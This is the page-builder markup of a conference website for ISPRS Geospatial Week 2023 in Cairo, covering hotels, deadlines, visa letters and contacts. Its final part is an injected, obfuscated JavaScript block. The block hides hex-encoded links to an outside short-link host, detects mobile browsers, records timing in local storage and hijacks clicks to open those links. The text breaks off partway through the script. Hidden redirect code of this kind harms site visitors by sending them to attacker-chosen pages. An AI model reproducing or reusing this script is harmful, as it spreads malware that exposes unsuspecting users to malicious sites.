border_width=\"10\"][vc_column_text css=\".vc_custom_1691508515384{margin-top: 50px !important;}\"]</p>\r\n\r\n<h1 style=\"text-align: center;\">Journals partner</h1>\r\n<h3 style=\"text-align: center;\">The author has the opportunity to publish his/her articles in one of the following journals :</h3>\r\n&nbsp;\r\n<p style=\"text-align: center;\"><span style=\"color: #000000;\"><a style=\"color: #000000;\" href=\"https://www.springer.com/journal/43995/\"><span style=\"font-size: 14pt;\"><strong>Journal of Umm Al-Qura University for Engineering and Architecture</strong></span></a></span></p>\r\n<p style=\"text-align: center;\"><span style=\"font-size: 14pt;\"><strong><a href=\"http://www.springer.com/journal/43995\">www.springer.com/journal/43995</a></strong></span></p>\r\n\r\n<h3></h3>\r\n&nbsp;\r\n\r\n&nbsp;\r\n<p style=\"text-align: center;\"><span style=\"font-size: 14pt; color: #000000;\"><strong>Journal of Engineering and Thermal Sciences (JETS) ISSN (Online) 2669-2465</strong></span></p>\r\n<p style=\"text-align: center;\"><strong><span style=\"font-size: 14pt;\"><a href=\"http://www.extrica.com/journal/jets\">www.extrica.com/journal/jets</a></span></strong></p>\r\n[/vc_column_text][/vc_column_inner][vc_column_inner][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row css=\".vc_custom_1668205719738{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column css=\".vc_custom_1668010547399{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_separator style=\"shadow\" border_width=\"10\"][vc_column_text css=\".vc_custom_1687848604610{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 10px !important;}\"]\r\n<h2 style=\"color: #311b92; text-align: center;\"><strong> EGYPT GSW\'2023</strong></h2>\r\n[/vc_column_text][/vc_column][/vc_row][vc_row content_placement=\"top\" css=\".vc_custom_1687710509489{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column width=\"1/3\" css=\".vc_custom_1687711699560{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_text css=\".vc_custom_1687711558584{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"]\r\n<p style=\"text-align: justify;\">As we celebrate our 50th anniversary, the Arab Academy for Science, Technology, and Maritime Transport (AASTMT) is honored to host the ISPRS first Geospatial Week in Africa and Middle East in 2023 (GSW-2023) that will be held under the auspices of H.E Secretary-General of the League of Arab States. The conference will be held in September 2023, at the InterContinental Cairo Semiramis Cairo, Egypt. AASTMT strongly believes that science is the key to the future and the cornerstone for nations\' progress and prosperity. <a href=\"https://gsw2023.com/index.php/welcome/\"><span style=\"text-decoration: underline;\"><strong><span style=\"color: #3366ff; text-decoration: underline;\">Read More</span></strong></span></a></p>\r\n[/vc_column_text][/vc_column][vc_column width=\"2/3\" css=\".vc_custom_1668010506951{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][dt_team_masonry order=\"asc\" custom_content_bg_color=\"#e8e8e8\" image_sizing=\"proportional\" img_max_width=\"120px\" image_paddings=\"10px 0px 0px 0px\" img_border_radius=\"10px\" post_title_bottom_margin=\"0px\" team_position_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" soc_icon_color=\"#ffffff\" posts_offset=\"0\" category=\"105\" css_dt_team_masonry=\".vc_custom_1687711659617{margin-top: 0px !important;}\"][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-animated\" bg_image_new=\"id^3283|url^https://gsw2023.com/wp-content/uploads/2022/11/1664433062169.jpg|caption^null|alt^null|title^1664433062169|description^null\" animation_direction=\"top-animation\" bg_override=\"ex-full\" fadeout_row=\"fadeout_row_value\" enable_overlay=\"enable_overlay_value\" overlay_color=\"#3a3a3a\" overlay_pattern=\"transperant\" overlay_pattern_opacity=\"75\"][vc_column width=\"1/3\"][vc_column_text css=\".vc_custom_1687564704480{margin-top: -4px !important;margin-left: -50px !important;border-left-width: -50px !important;}\"]\r\n<h4 style=\"text-align: center;\"><span style=\"color: #000000; padding: 5px; background-color: rgba(255,255,255, 0.7); font-size: 14pt;\">InterContinental Cairo Semiramis</span></h4>\r\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\"><img class=\" wp-image-3289 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2022/11/282192719-300x169.jpg\" alt=\"\" width=\"298\" height=\"168\" /></span></h4>\r\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\">Conference Venue </span></h4>\r\n&nbsp;\r\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\">Special Rate Booking is Opened Now</span></h4>\r\n<h5></h5>\r\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is August 10, 2023</span></h5>\r\n[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fwww.ihg.com%2Fredirect%3Fpath%3Dasearch%26brandCode%3D6C%26localeCode%3Den%26regionCode%3D1%26hotelCode%3DCROHA%26checkInDate%3D01%26checkInMonthYear%3D082023%26checkOutDate%3D08%26checkOutMonthYear%3D082023%26rateCode%3DAAFST%26_PMID%3D99801505%26GPC%3DARA%26cn%3Dno%26viewfullsite%3Dtrue|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1690569939761{margin-top: -25px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: -50px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][vc_column width=\"1/3\" awb_type=\"image\"][vc_column_text css=\".vc_custom_1687553105001{margin-top: 0px !important;}\"]\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt; color: #000000; padding: 5px; background-color: rgba(255,255,255, 0.7);\">Ramses Hilton hotel</span></h4>\r\n<h4></h4>\r\n<img class=\"aligncenter\" src=\"https://www.hilton.com/im/en/CAIRHTW/16763081/exterior-night-shot.jpg?impolicy=crop&amp;cw=4849&amp;ch=3334&amp;gravity=NorthWest&amp;xposition=75&amp;yposition=0&amp;rw=320&amp;rh=220\" alt=\"Hotel Exterior at Night\" width=\"262\" height=\"180\" />\r\n\r\n&nbsp;\r\n<h4 style=\"text-align: center;\"></h4>\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><span style=\"color: #ffffff;\">Special Rate Booking is O</span><span style=\"color: #ffffff;\">pened Now</span></span></h4>\r\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is August 10, 2023</span></h5>\r\n[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fwww.hilton.com%2Fen%2Fattend-my-event%2Fcairhtw-gaas23-e979b836-791b-44ea-9095-410655c177d0%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1690251704410{margin-top: 10px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]BOOK NOW[/dt_default_button][vc_btn title=\"For More Hotels\" color=\"info\" align=\"center\" link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fhotel-accommodation%2F\"][/vc_column][vc_column width=\"1/3\"][vc_column_text]\r\n<h4 class=\"qrShPb pXs6bb PZPZlf q8U8x aTI8gc EaHP9c\" style=\"text-align: center;\" data-dtype=\"d3ifr\" data-local-attribute=\"d3bn\" data-attrid=\"title\" data-ved=\"2ahUKEwi88f_AuNX_AhU5gv0HHQT_D7wQ3B0oAHoECDsQAQ\"><span style=\"color: #000000; padding: 5px; background-color: rgba(255,255,255, 0.7); font-size: 18pt;\">Flamenco Cairo Hotel</span></h4>\r\n<h4></h4>\r\n<a href=\"https://www.flamencohotels.com/web/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter\" src=\"https://www.flamencohotels.com/web/wp-content/uploads/2020/02/4Z4A4470-Low.jpg\" alt=\"\" width=\"281\" height=\"187\" /></a>\r\n\r\n&nbsp;\r\n<h4 style=\"text-align: center;\"></h4>\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><span style=\"color: #ffffff;\">Special Rate Booking is O</span><span style=\"color: #ffffff;\">pened Now</span></span></h4>\r\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is September 1, 2023</span></h5>\r\n[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fflamenco-cairo-hotel%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1687391423079{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3103\" img_size=\"120x120\" alignment=\"center\" css=\".vc_custom_1687570749968{margin-top: 12px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"][ult_countdown count_style=\"ult-cd-s2\" datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin,ssec\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_style=\"font-weight:bold;\" timer_unit_font_family=\"font_family:|font_call:\" tick_unit_style=\"font-weight:bold;\" css_countdown=\".vc_custom_1668204929553{margin-top: 20px !important;}\" tick_size=\"desktop:50px;\"][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\" css=\".vc_custom_1687570624975{margin-top: 140px !important;}\"][/vc_column][vc_column width=\"1/2\"][vc_row_inner css=\".vc_custom_1687570128641{margin-top: -70px !important;}\"][vc_column_inner width=\"1/2\"][vc_column_text css=\".vc_custom_1692140427657{margin-top: 50px !important;}\"]\r\n<h5 style=\"text-align: center;\"><strong>September 3, 2023</strong></h5>\r\n<h5 style=\"text-align: center;\"><strong><span lang=\"EN-US\">Dinner and Show on </span>Nile Crystal Cruising Restaurant</strong></h5>\r\n<img class=\"wp-image-5195 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2023/08/d2-1-300x300.jpg\" alt=\"\" width=\"198\" height=\"198\" />[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_column_text css=\".vc_custom_1687570551843{margin-top: 50px !important;}\"]\r\n<h5 style=\"text-align: center;\">September 5, 2023</h5>\r\n<h5 style=\"text-align: center;\">Dinner and Show on The Citadel of Cairo</h5>\r\n<img class=\"wp-image-5196 size-medium aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2023/08/d1-1-300x201.jpg\" alt=\"\" width=\"300\" height=\"201\" />[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row content_placement=\"middle\" bg_type=\"image\" parallax_style=\"vcpb-default\" bg_image_new=\"id^3365|url^https://gsw2023.com/wp-content/uploads/2022/11/cairo-egypt_shutterstock_1421974805-1-scaled.jpg|caption^null|alt^null|title^cairo-egypt_shutterstock_1421974805|description^null\" bg_image_posiiton=\"0\" bg_override=\"ex-full\" enable_overlay=\"enable_overlay_value\" overlay_color=\"rgba(0,0,0,0.58)\"][vc_column width=\"1/2\" css=\".vc_custom_1686320668385{margin-top: -25px !important;}\"][ultimate_heading main_heading=\"Important Dates\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-top:25px;margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]\r\n<ul>\r\n 	<li style=\"text-align: left;\">\r\n<h5><span style=\"color: #ffffff;\"><strong>Camera ready paper submission: July 15, 2023 </strong></span></h5>\r\n</li>\r\n 	<li style=\"text-align: left;\">\r\n<h5><span style=\"color: #ffffff;\"><strong>Deadline for submission of travel grants funded by The ISPRS Foundation is: June 16, 2023</strong></span></h5>\r\n</li>\r\n 	<li style=\"text-align: left;\">\r\n<h5><span style=\"color: #ffffff;\"><strong>Early bird registration deadline: July 1, 2023</strong></span></h5>\r\n</li>\r\n</ul>\r\n[/ultimate_heading][ultimate_heading main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"][/ultimate_heading][/vc_column][vc_column width=\"1/2\"][ultimate_heading main_heading=\"Invitation Letter\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]\r\n<h2 style=\"text-align: center;\"></h2>\r\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 12pt;\"><strong>You can generate an invitation letter automatically once you provide your information.</strong></span></h5>\r\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\"><strong> </strong></span><strong><span style=\"color: #ffff00;\"><a style=\"color: #ffff00;\" href=\"https://visa.gsw2023.com/\" target=\"_blank\" rel=\"noopener\">Get Your Invitation letter</a></span></strong></h5>\r\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\"><strong> </strong></span></h5>\r\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 12pt;\"><strong>If you require specific format for the Visa Letter, please Send email with the additional information to</strong></span></h5>\r\n<h5 style=\"text-align: center;\"><span style=\"color: #ffff00;\"><strong> </strong><a style=\"color: #ffff00;\" href=\"mailto:GSW-visa@gsw2023.com\" target=\"_blank\" rel=\"noopener\">GSW-visa@gsw2023.com</a><strong> </strong></span></h5>\r\n[/ultimate_heading][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"custom\" style=\"shadow\" border_width=\"7\" accent_color=\"#311b92\"][vc_column_text]\r\n<h3 style=\"text-align: center;\"><span style=\"font-size: 24pt;\"><strong>Keynotes Speakers and Panelists</strong></span></h3>\r\n[/vc_column_text][dt_team_masonry order=\"asc\" image_sizing=\"proportional\" img_max_width=\"200px\" image_paddings=\"10px 10px 10px 10px\" img_border_radius=\"10px\" bwb_columns=\"desktop:4|h_tablet:3|v_tablet:2|phone:1\" post_title_bottom_margin=\"0px\" show_team_desc=\"n\" read_more_button=\"off\" soc_icon_border_width=\"0px\" soc_icon_color=\"#ffffff\" posts_offset=\"0\" category=\"104\"][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3229\" img_size=\"700x525\"][/vc_column][vc_column width=\"1/2\"][vc_single_image image=\"3225\" img_size=\"675x480\"][dt_default_button link=\"url:https%3A%2F%2Faast.edu%2Fen%2F|target:_blank\" smooth_scroll=\"y\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" animation=\"swing\" css=\".vc_custom_1668027792405{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]MORE[/dt_default_button][/vc_column][/vc_row][vc_row bg_type=\"grad\" bg_override=\"ex-full\" type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668009257885{padding-top: 40px !important;padding-bottom: 60px !important;}\" bg_grad=\"background: -webkit-gradient(linear, left top, left bottom, color-stop(10%, #311B92), color-stop(95%, #311B45));background: -moz-linear-gradient(left,#311B92 10%,#311B45 95%);background: -webkit-linear-gradient(left,#311B92 10%,#311B45 95%);background: -o-linear-gradient(left,#311B92 10%,#311B45 95%);background: -ms-linear-gradient(left,#311B92 10%,#311B45 95%);background: linear-gradient(left,#311B92 10%,#311B45 95%);\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][vc_row_inner][vc_column_inner width=\"1/2\"][dt_fancy_title title=\"GSW2023 Venue\" title_size=\"h2\" title_color=\"accent\" separator_style=\"disabled\" el_width=\"200\"][vc_separator color=\"white\" style=\"shadow\" border_width=\"5\"][vc_column_text]\r\n<h4 style=\"text-align: justify; color: cyan;\">GSW2023 Will be held at the</h4>\r\n<h4 style=\"text-align: justify; color: white;\"><strong>InterContinental Cairo Semiramis</strong></h4>\r\n&nbsp;\r\n<h4 style=\"text-align: justify; color: cyan;\"><strong>For More Information:</strong></h4>\r\n<span style=\"font-size: 12pt;\"><strong>Contact us at: </strong><a href=\"mailto:info@gsw2023.com\"><strong>info@gsw2023.com</strong></a></span>\r\n<h5 style=\"text-align: justify; color: white;\"><strong>The Arab Academy for Science, Science, and Maritime Transport</strong></h5>\r\n<h5 style=\"text-align: justify; color: white;\"></h5>\r\n<h5 style=\"text-align: justify; color: white;\"><strong>P.O. Box 1029 -Gamal Abdelnaser st. -Miami ,Alexandria</strong></h5>\r\n<h5 style=\"text-align: justify; color: white;\"><strong>Tel :(+203) 5497598</strong></h5>\r\n<h5 style=\"text-align: justify; color: white;\"><strong>Fax:(+203) 5497598</strong></h5>\r\n[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_gmaps link=\"#E-8_JTNDaWZyYW1lJTIwc3JjJTNEJTIyaHR0cHMlM0ElMkYlMkZ3d3cuZ29vZ2xlLmNvbSUyRm1hcHMlMkZlbWJlZCUzRnBiJTNEJTIxMW0xOCUyMTFtMTIlMjExbTMlMjExZDM0NTMuNzgzNzk1Mjk1ODM5JTIxMmQzMS4yMjk4MDEzMTUxMTUwMiUyMTNkMzAuMDQzMDU5OTgxODgyNzc0JTIxMm0zJTIxMWYwJTIxMmYwJTIxM2YwJTIxM20yJTIxMWkxMDI0JTIxMmk3NjglMjE0ZjEzLjElMjEzbTMlMjExbTIlMjExczB4MCUyNTNBMHg4Mzk4MmRiOWY2ODY5Y2ElMjEyek16RENzREF5SnpNMUxqQWlUaUF6TWNLd01UTW5OVFV1TWlKRiUyMTVlMCUyMTNtMiUyMTFzZW4lMjEyc2VnJTIxNHYxNjYzMzI1MDg5MDEwJTIxNW0yJTIxMXNlbiUyMTJzZWclMjIlMjB3aWR0aCUzRCUyMjg4NSUyMiUyMGhlaWdodCUzRCUyMjQ1MCUyMiUyMHN0eWxlJTNEJTIyYm9yZGVyJTNBMCUzQiUyMiUyMGFsbG93ZnVsbHNjcmVlbiUzRCUyMiUyMiUyMGxvYWRpbmclM0QlMjJsYXp5JTIyJTIwcmVmZXJyZXJwb2xpY3klM0QlMjJuby1yZWZlcnJlci13aGVuLWRvd25ncmFkZSUyMiUzRSUzQyUyRmlmcmFtZSUzRSUyMA==\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668026824667{padding-top: 40px !important;padding-bottom: 40px !important;}\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][ultimate_heading main_heading=\"GSW\'2023\" main_heading_color=\"#311b92\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\"][/ultimate_heading][vc_separator color=\"custom\" style=\"shadow\" border_width=\"10\" accent_color=\"#40f7e5\"][ult_countdown datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_sep_col=\"#311b92\" tick_unit_style=\"font-weight:bold;\" tick_style=\"font-weight:bold;\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][dt_icon_text dt_text_title=\"info@gsw2023.com\" dt_text_custom_title_color=\"#311b92\" dt_text_desc=\"\" show_btn=\"n\" dt_text_icon_border_width=\"2px\" dt_text_icon_color=\"#ffffff\"][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_column_text]\r\n<p style=\"text-align: center;\"><strong><a href=\"mailto:gsw2023@aast.edu\">gsw2023@aast.edu</a></strong></p>\r\n<p style=\"text-align: center;\"><strong> <a href=\"mailto:aaelbary@gsw2023.com\">aaelbary@gsw2023.com</a></strong></p>\r\n[/vc_column_text][/vc_column][/vc_row]\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g 